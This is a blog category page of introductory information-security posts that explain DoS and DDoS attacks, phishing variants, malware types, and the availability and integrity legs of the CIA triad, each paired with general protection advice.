Category: InfoSec

InfoSec

Information Security Threats: DOS and DDOS

A flood overwhelming a dam
As part of this series on information security, we’ve been talking about the types of threats. We covered types of malware, types of phishing, and today we’re going to cover the types of denial of service attacks.

In our modern world where everything is connected to the Internet, the threat of cyber attacks looms large. Among the most disruptive of these are Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks. Let’s delve into what these attacks are and how they work.

What is a DoS Attack?

A Denial of Service attack is a malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DoS attacks achieve effectiveness by using a single internet-connected device, like one computer, to flood a target with requests until normal traffic is unable to be processed.

The Mechanics Behind a DoS Attack

  1. Exploiting Vulnerabilities: The attacker finds a vulnerability in a target system that can be exploited. This could be as simple as a web server that crashes under too many requests.
  2. Flood of Requests: Once the vulnerability is identified, the attacker sends a large number of requests to the server, more than it can handle. Think of a mailbox that is too stuffed with letters that no new ones can be delivered.
  3. Service Disruption: As a result, the server is unable to handle legitimate requests, leading to denial-of-service to regular users.

What is a DDoS Attack?

A Distributed Denial of Service (DDoS) attack is a more complex, powerful version of the DoS attack. Here, the attack is launched from multiple compromised devices, often distributed globally. These networks of compromised devices are known as botnets.

Understanding DDoS Attacks

  1. Building a Botnet: Attackers infect multiple devices with malware, turning them into bots. These devices can range from computers to IoT devices. You might think that you’re safe because “who would want your information?”. The truth is that your computer, computing power, and bandwidth are still a pretty valuable commodity.
  2. Coordinated Attack: The attacker then uses this botnet to send a massive number of requests to the target simultaneously.
  3. Magnified Impact: The distributed nature of this attack makes it more difficult to stop since it comes from multiple sources and can generate more traffic than a single source. Stopping it isn’t as simple as blocking an IP Address or IP Range.

The Implications of DoS and DDoS Attacks

The impact of these attacks can be extensive. Businesses can experience service disruptions, financial losses, and damage to their reputation. In severe cases, critical online services like banking, healthcare, or government services can be affected.

Protecting Against DoS and DDoS Attacks

  • Robust Infrastructure: Organizations should invest in robust server infrastructure that can handle high traffic volumes.
  • Security Measures: Implement security measures like firewalls – including next-generation firewalls (NGFW) – and intrusion detection systems (IDS) to identify and mitigate attacks.
  • Monitor Traffic: Regular monitoring of network traffic can help in early detection of unusual patterns that signify an attack.
  • Response Plan: Have a clear response plan in place to quickly address and mitigate the impact of an attack.

Aside from Ransomware, DoS and DDoS attacks represent some of the most significant threats to network environments today. They are capable of bringing down websites and other services. Understanding these attacks is the first step in defending against them and it is crucial for individuals and organizations alike to be aware of these threats and to take proactive measures to protect their digital assets.

InfoSec

Information Security Threats: Phishing, Whaling, etc

Cartoon Representing PhishingPhishing has become a household term in recent years, and for good reason. There are news stories about it, mandatory corporate training to keep you from falling for it, and it still remains prevalent and a fruitful ways for the “bad guys” to succeed. So what is phishing? Phishing represents a range of techniques used by cybercriminals to deceive individuals into divulging sensitive information. Phishing now comes in many forms. And just like every political scandal gets -gate added as a suffix because of Watergate (Gamergate, Chinagate, Emailgate, Russiagate, etc), each of these forms of phishing gets the -ishing suffix. Clever, right?

Phishing: Your Inbox is the Battleground

The OG, Phishing is the most common form of cyber deceit. It involves sending mass emails that appear to come from reputable sources, such as banks or popular websites, with the goal of stealing sensitive data like login credentials or credit card numbers. These emails often create a sense of urgency, prompting you to act quickly with the hope that you won’t do your due diligence. Typically, the sender will appear to come from a safe domain, but will be just wrong. Some common examples are things like goolge.com instead of google.com or gimletrnedia.com instead of gimletmedia.com. Even if they don’t try to make the email sender look legit, the form you get sent you might be for a domain that is set up with those tactics. Another trick is to have a very long domain like secure.google.com.hacker.co/blah/blah/etc.php and people might only notice the “google.com” portion instead of noticing the actual domain is “hacker.co”. These people will make exact duplicates of a Google, Microsoft, Amazon, or bank login screen and then steal your credentials. Where possible, the smart ones will even pass those credentials on and get you logged into the site so you’re none the wiser.

Protection Tip: Always verify the sender’s email address and be wary of emails that demand immediate action. Legitimate organizations won’t ask for sensitive information via email.

Spear Phishing: Targeted Attacks

Spear phishing is a more targeted version of phishing, so named because the same tactics are used as phishing except that the target is very deliberate. This is the difference between dropping a fishing line in a water to catch “any fish that swims by” vs spear fishing and jabbing a spear into the water to catch “this exact fish”. With Spear Phishing, the attacker personalizes the email to fit the recipient – using your name, job title, or other personal information – making the fraudulent communication seem more credible. Often, these emails might even seem to come from a higher-up in the company and they need you to wire money to a vendor urgently, or review this document immediately (behind a phishing lure).

Protection Tip: Be cautious with the amount of personal information you share online. Regularly update your privacy settings on social media and professional platforms. Open Source Intelligence (OSINT) is the key way that attackers learn this information about you to make it seem like they know you or already are in your organization.

Whaling: Going After the Big Fish

We’re keeping the metaphor going here with Whaling. Traditionally, whaling is done with harpoons (and what are harpoons but basically large spears?!?). Whaling attacks are Spear Phishing attacks that specifically target high-profile individuals like CEOs or CFOs. The emails mimic critical business communications, often involving legal or financial matters, to trick the victim into transferring funds or revealing sensitive corporate information.

Protection Tip: High-ranking individuals should be extra vigilant. Double-check the source of unexpected requests and verify through direct, secure communication channels. If possible, have the IT department put extra protection around the email accounts of key figures. Many business email providers offer this protection (Microsoft Defender for Email offers Priority Account Protection, for instance).

Vishing: The Voice of Deception

Now we’ve stopped being clever and have ventured into the “Russiagate” level of naming and have lost the metaphor and instead heading for the land of portmanteaus. Vishing, or voice phishing, involves phone calls instead of emails. The caller impersonates a trusted authority to extract personal information or financial details. If users aren’t trained well or if your organization doesn’t have the right protocols around verifying a caller, this can be an easy way to get too much information. I’ve done this myself when one of my accounts with a retailer was used without authorization. I called up and couldn’t get an answer, but I was able to get a few things from the phone agent that they didn’t mind sharing. Then I called back and had my original information plus this other information and the person on the other end of the line assumed I was okay to know more about the transaction because I knew so much already, so I must be okay. Attackers especially skilled in building trust and using social manipulation can move mountains this way.

Protection Tip: Be skeptical of unsolicited phone calls. If in doubt, hang up and contact the organization directly using an official number.

Smishing: SMS-Based Scams

Another portmanteau, Smishing is like phishing but carried out through SMS text messages. These messages may contain malicious links or request personal information. You have probably received these recently. USPS wants to tell you you have a package that can’t be delivered. The IRS wants to talk to you about your huge overdue tax bill. Your bank wants to confirm your information. None of this is something that would happen or be communicated this way unexpectedly. Never respond to a text link, but instead go to the actual site and login. Any legitimate messages for you will be there when you arrive. If you’re still in doubt, call the company using a phone number from their verified web page or a trusted directory and confirm the message. Otherwise, you’re asking for trouble.

Protection Tip: Avoid clicking on links in text messages from unknown sources. Install a reputable security app on your phone to filter out potential scams.

In the current world of online threats, knowledge and familiarity is your best defense. By understanding these tactics and adopting cautious online behaviors, you can significantly reduce the risk of falling victim to these increasingly sophisticated scams. Remember, cybersecurity is a continuous process. Regularly updating your software, using strong, unique passwords, and being mindful of the information you share online are crucial steps in protecting yourself and your data.

Stay informed, stay skeptical, and stay safe.

InfoSec

Information Security Threats: Malware

Computer showing a malware messageWe’ve been talking about the CIA Triad, which is a shorthand for what it is that we’re trying to defend with our security practices. Now that we understand what’s at stake, we’re going to spend the next few posts talking about how various threats are going to try to take out one or more of those legs. In this post, we’re going to talk about Malware.

Malware, which is a portmanteau of “malicious software,” encompasses a broad range of software intentionally designed to harm, exploit, or disrupt computers, networks, servers, and computer systems. This includes a variety of forms such as viruses, worms, trojan horses, ransomware, spyware, adware, and more. Each type of malware has its unique mode of infection and impact, ranging from stealing sensitive information, damaging system operations, to hijacking core computing functions for malicious intent. The significance of understanding and guarding against malware cannot be overstated.

In our increasingly digital and interconnected world, where personal and professional lives are mixed with technology, malware poses a significant threat to individual privacy, financial security, and business operations. The growth of malware highlights the need for robust cybersecurity measures, regular system updates, cautious online behavior, and an informed understanding of digital threats. By recognizing the potential hazards of malware and taking proactive steps to protect against it, individuals and organizations can significantly reduce their vulnerability to these malicious threats.

1. Viruses

  • Definition: A virus is a type of malicious software that, when executed, replicates itself by modifying other computer programs and inserting its own code.
  • How it Works: When this replication succeeds, the affected areas are then said to be “infected”. Viruses often require a host program to be executed, such as a document or file.
  • Impact: They can perform various malicious tasks, such as stealing hard disk space or CPU time, accessing private information, corrupting data, displaying political or humorous messages on the user’s screen, spamming their email contacts, and even rendering the computer useless.

2. Worms: The Independent Malware

  • Definition: A worm is similar to a virus by design and is considered a sub-class of a virus. However, it differs in its function – it spreads across networks and computers without needing a host file.
  • How it Works: Worms exploit vulnerabilities in operating systems and software and are known for their capability to replicate themselves autonomously.
  • Impact: They often cause harm to their host networks by consuming bandwidth and overloading web servers. Worms can also carry payloads, which might steal data, delete files, or create botnets.

3. Trojans: The Deceptive Threat

  • Definition: A Trojan horse, or Trojan, is any malicious computer program which misleads users of its true intent.
  • How it Works: Unlike viruses and worms, Trojans do not replicate themselves but pose as legitimate software. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems.
  • Impact: Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system.

4. Ransomware: The Hostage-Taker

  • Definition: Normally, cryptography is defensive in nature. You encrypt things to keep them for “eyes only”. Cryptovirology is using cryptography in an offensive way… “infecting you with encryption” in a way. Ransomware is a type of malware that uses cryptovirology and threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid.
  • How it Works: Some ransomware types encrypt files on the system’s hard drive (cryptoviral extortion), while others may simply lock the system and display messages intended to coerce the user into paying.
  • Impact: Ransomware attacks can lead to significant data loss and financial damages, both from the ransom paid and the downtime caused by the attack.

Understanding these various types of malware is the first step in protecting yourself and your organization from them. Always ensure you have updated antivirus software, practice safe browsing, and be cautious with emails and downloads. Awareness and preparedness are key in navigating the complex world of digital threats.

InfoSec

The CIA Triad: Availability

Open SignPreviously, we’ve introduced the CIA Triad and the components of its acronym: Confidentiality, Integrity, and Availability. We’ve already covered Confidentiality and Integrity, this time we’re going to cover Availability.

In the trinity of information security principles, known as the CIA Triad, ‘Availability’ is the leg that is most often easily attacked by “script kiddies” or ruined by our own success. Today, let’s unravel what Availability means in information security, its real-world significance, and the fallout when it’s compromised.

Understanding Availability

In the context of information security, Availability refers to ensuring that information and resources are accessible to authorized users when needed. It’s not just about having data; it’s about having data ready for use, unhindered by obstacles like system failures, cyberattacks, or natural disasters.

Ensuring Availability

Redundant Systems
These are backup systems that kick in when the primary system fails, ensuring continuous access to data. This would be very important if your system has a failure due to hardware failures. Do you have the ability for your active system to switch to another hot system, a warm system, or even a cold site? How quickly?
Regular Maintenance and Updates
Keeping systems updated and well-maintained to prevent downtime caused by software or hardware issues. Best way to stay out of trouble is to avoid trouble. You need to make sure you’re patched and your equipment is running well, as well as relying on things like SMART for hard drive health. This is also where knowing metrics like MTTF (Mean Time to Failure) are important. If you have components that are coming up on their expected shelf-life, you need to start mitigating now.
Disaster Recovery Plans
Preparing for the worst – from cyberattacks to natural disasters – to ensure rapid restoration of services. What do you do if something happens to an entire site? That can mean your local power grid if you’re self-hosting, or issues with cloud regions with the big providers (it happens… more than we’d like!). Just like with Redundant Systems, you should have Redundancy at both the micro and macro level for your system.

Real-World Examples

E-Commerce Platforms
Imagine an e-commerce site crashing on Black Friday. The lack of availability can lead to significant financial loss and customer dissatisfaction. All “scale-based” attacks don’t have to be Denial of Service (DOS) or Distributed Denial-of-Service (DDOS). Sometimes, you can DOS yourself by running a huge promotion or you can get squished by going viral on a site like Reddit.
Healthcare Systems
In healthcare, system availability can be a matter of life and death. If medical staff can’t access patient records promptly, patient care could be compromised. This is true at every leg of the chain. You don’t have to look too far into the past to remember the Healthcare.gov debacle where literally hundreds of millions of dollars were spent on a site that couldn’t stand up to everyone trying to sign up for “Obamacare”. You’d think those millions could buy you a few people who had worked at Facebook, Twitter, Reddit, Netflix, or somewhere where they might have had an idea how to ensure Availability through hard-learned lessons, but apparently not.
Banking Services
If an online banking platform is unavailable, customers cannot perform transactions, leading to frustration and potential financial complications. We just take this one for granted because banks have gotten so good at this, but imagine if you went to the store and tried to use your card and your bank (and just your bank) wasn’t playing ball today. I’ve been in stores where the “Credit Card Machine” was down, but I can’t think of one time that I couldn’t use my banking features due to my bank having an issue. I’m not saying it never happens, but this might just be the rarest version of this because they take Availability very seriously.

The Consequences of Poor Availability

When systems aren’t available, the consequences can be dire. We covered that a little bit with the real world examples, but here are some consequences boiled down:

Loss of Revenue
For businesses, downtime often translates directly into lost revenue, especially for services that depend on continuous online presence.
Damaged Reputation
Customers expect reliability. Frequent downtimes can tarnish an organization’s reputation and erode trust.
Operational Disruption
In sectors like manufacturing or logistics, lack of availability in information systems can lead to halted production lines or disrupted supply chains.

Protecting Against Availability Threats

To safeguard against threats to availability, organizations should:

Invest in Robust Infrastructure
This includes not only having backup systems but also ensuring that the infrastructure can handle high loads and resist cyberattacks. This one can be expensive, so a lot of people short change it at the beginning of their journey. “I can barely afford one server, how can I afford to pay for a second one I may never need?” I get it… but accepting a risk doesn’t make it go away. This is one that you’ll want to mitigate as soon as possible.
Implement Effective Monitoring Systems
These systems can alert administrators to potential issues before they cause downtime. Have you ever wondered what people are doing in Network Operations Centers (NOCs) and Security Operations Centers (SOCs)? This.. they are doing this. They are keeping their fingers on the pulses of all of the logs and metrics behind the systems, hoping to find signs of intrusions and failures and prevent them or respond as soon as possible.
Regularly Test Recovery Procedures
Regular testing ensures that, in the event of a system failure, the recovery processes are effective and efficient. Netflix has their Chaos Monkey code that just randomly shuts stuff off to ensure they can handle that happening regularly. They were the first company I heard of doing such a thing. They’ve since open-sourced it to share with others to potentially make everyone stronger. According to them, “Chaos Monkey randomly terminates virtual machine instances and containers that run inside of your production environment. Exposing engineers to failures more frequently incentivizes them to build resilient services.” Yep.

Conclusion

The ‘A’ in the CIA Triad – Availability – is a crucial component of information security. In our interconnected world, where we depend on instant access to information, ensuring that this information is readily available is as important as keeping it secure and intact. Knowing how to keep your systems running in the face of all that the world has to throw at you is vitally important and something you need to consider with your technology decisions.

InfoSec

The CIA Triad: Integrity

Wax SealPreviously, we’ve introduced the CIA Triad and the components of its acronym: Confidentiality, Integrity, and Availability. We’ve already covered Confidentiality and this time we’re going to cover the often overlooked Integrity.

In the world of information security, the CIA Triad is a model designed to guide policies for information security within an organization. While Confidentiality and Availability often steal the spotlight, today, we’re focusing on the often-understated ‘I’ of the triad: Integrity. It’s all about maintaining the trustworthiness and accuracy of data. Let’s explore why Integrity is pivotal and the real-world implications when it’s compromised.

What is Data Integrity?

Data Integrity in information security refers to the reliability and trustworthiness of data throughout its lifecycle. It’s about ensuring that information remains unaltered from its source to destination as well as during storage, retrieval, and processing.

Means of Ensuring Data Integrity

Here are some of the practical ways that we can ensure data integrity:

Hashing and Checksums
These are mathematical algorithms that create a unique digital fingerprint of data. Any alteration to the data changes this fingerprint, indicating a potential compromise. For sensitive files, you can create a checksum when the file is created. You publish those checksums and when you download the file or access it again, you can recreate the checksum and see if they match. This is very common when downloading software from reputable sites.
Access Controls
Limiting who can alter data ensures that only authorized personnel can make changes, reducing the risk of malicious alterations. This one can be a little less obvious, but basically it is a lot harder to add an article to NyTimes.com than it is to edit a Wikipedia page or publish a post on Reddit. That helps ensure that NyTimes.com contains only the information the owners want it to and ensure that it isn’t changed to represent something different from that.
Version Control Systems
These systems track changes to documents or codebases, allowing the recovery of earlier versions if unauthorized changes are detected. If you’re a software developer, this isn’t only Git or the equivalent. This also includes Track Changes in MS Word and file versioning inside something like DropBox or Sharepoint. Because every change is tracked and the details are recorded, this makes it less likely that the change can go unnoticed, or that it would become irrevocable.

Real-World Examples

When and how would we see this in play? And why would we care in our personal lives? Consider:

Financial Transactions
Imagine transferring money online, but the transaction details are altered, sending your funds to a hacker’s account. If integrity checks didn’t exist along the way, no one would know where the transfer went or that it wasn’t your original intentions. Integrity controls in banking systems are crucial to prevent such occurrences.
Healthcare Records
A patient’s treatment plan is based on their medical history. If this data is altered, it could lead to incorrect treatments, posing serious health risks. If there was no integrity around the records, imagine the disaster that could occur if a malicious agent removed dealdly allergies from a patient’s file. The patient could easily die.
Legal Evidence
In legal proceedings, the integrity of evidence is paramount. Any tampering with digital evidence can lead to wrongful convictions or acquittals. This is the same deal as the Healthcare Records. What if someone could create/update/delete evidence or even just tamper with the chain of custody documents to have the evidence thrown out?

The Consequences of Compromised Integrity

When data integrity is breached, the results can be catastrophic:

Financial Loss
In the business world, altered data can lead to incorrect financial decisions, affecting a company’s bottom line. You could topple markets if you could change the data in financial reports published to the market.
Mistrust and Reputation Damage
When data integrity is compromised, it can erode trust in an organization, damaging its reputation and leading to loss of customers or partners. How long would you stay with an organization that greeted you by the wrong name when you signed in, showed the wrong order history, and the wrong demographics? Or if the doctor discussed procedures or diagnoses that never occurred? You’d be out in a minute, talking bad about them to anyone who would listen!
Legal and Compliance Issues
Many industries have regulatory requirements for data integrity. Violations can lead to legal penalties and fines. Imagine if SEC reports, EPA reports, OSHA reports all contained incomplete or erroneous data. Someone would be on Larry King in bad way.

Protecting Against Integrity Threats

So now we know what can happen if we do it wrong, but how do we do it the right way? Protecting the integrity of data involves:

Regular Audits and Monitoring
Regular checks can detect and rectify any integrity issues before they escalate. This assumes that you know the “truth” to compare things to. This includes looking for data changes, unauthorized file access, revisiting permissions regularly, and taking Blue Teaming seriously.
Education and Awareness
Training staff on the importance of data integrity and the risks associated with data tampering. People don’t know what they don’t know. You have to make sure your staff is aware that this is important and that they follow procedures around Integrity.
Implementing Robust Security Protocols
This includes using encryption on your data, robust access controls, and secure backup systems.

The integrity of data is a cornerstone of information security. As more and more of our personal and professional lives are online, the accuracy and reliability of our data are more critical than ever. Understanding its importance, implementing measures to protect it, and being vigilant about potential threats are key steps in safeguarding the integrity of our information.

In a world where data drives decisions, let’s ensure the decisions are based on uncorrupted, trustworthy information.